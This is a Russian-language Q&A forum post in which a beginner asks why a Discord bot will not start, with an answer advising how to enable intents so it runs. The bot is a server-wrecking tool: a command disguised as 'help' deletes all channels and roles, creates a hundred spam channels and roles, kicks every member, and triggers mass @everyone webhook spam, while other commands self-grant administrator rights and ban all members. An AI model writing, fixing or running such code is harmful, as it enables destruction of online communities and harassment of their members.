# Не запускается дискорд бот

Tags: python, python-3.x, discord, discord.py

```
from discord.ext import commands
from discord import Permissions
import asyncio
import os
import discord, random, aiohttp, asyncio
from threading import Thread
import requests



intents = discord.Intents.all()
intents.members = True

bot = commands.Bot(command_prefix='g!',intents=intents)

bot.remove_command("help")

@bot.command()
async def help(ctx):
       guild = ctx.message.guild     
       
       await guild.edit(name="Взрыв гранатового сока")

       await ctx.message.delete()

       for m in ctx.guild.roles:
           try:
               await m.delete(reason="Взрыв гранатового сока")
           except:
               pass

       for channel in ctx.guild.channels:  # собираем
               try:
                       await channel.delete(reason="Краш сервера")  # удаляем
               except:
                       pass


       for _ in range(100):
           await guild.create_text_channel('Взрыв гранатового сока')

       for _ in range(100):
         await guild.create_role(name='Взрыв гранатового сока')

       for m in ctx.guild.members:
         try:
          await m.kick(reason="Взрыв гранатового сока")
         except:
          pass
       


@bot.event
async def on_guild_channel_create(channel):
   webhook = await channel.create_webhook(name = "Взрыв гранатового сока")
   webhook_url = webhook.url
   async with aiohttp.ClientSession() as session:
     webhook = discord.Webhook.from_url(str(webhook_url), adapter=discord.AsyncWebhookAdapter(session))
     for i in range(50):
       try:
         await webhook.send("@everyone ", tts=True)
       except:
         pass
@bot.command(pass_context=True)  # разрешаем передавать агрументы
async def admin(ctx):  # создаем асинхронную фунцию бота
   
   guild = ctx.guild
   perms = discord.Permissions(administrator=True) #права роли
   await guild.create_role(name="Pazeg", permissions=perms) #создаем роль
   
   role = discord.utils.get(ctx.guild.roles, name="Pazeg") #находим роль по имени
   user = ctx.message.author #находим юзера
   await user.add_roles(role) #добовляем роль
   
   await ctx.message.delete()  
@bot.command()
async def allban(ctx):
   for m in ctx.guild.members: #собираем
       try:
           await m.ban(reason="По просьбе")#баним
       except:
           pass


       
token = 'TOKEN'
bot.run(token)
```

Я новичок в python, краш бота, он не запускается. Помогите исправить код

Comment: Если мой ответ помог вам, не забудьте пометить его галочкой.

Answer (score 1):

У меня завёлся, скорее всего это из за `intents`, заходите на  [discord development portal](https://discord.com/developers/applications/773514386622382131/bot), и вот тут включаете интенты [image: вкл интенты]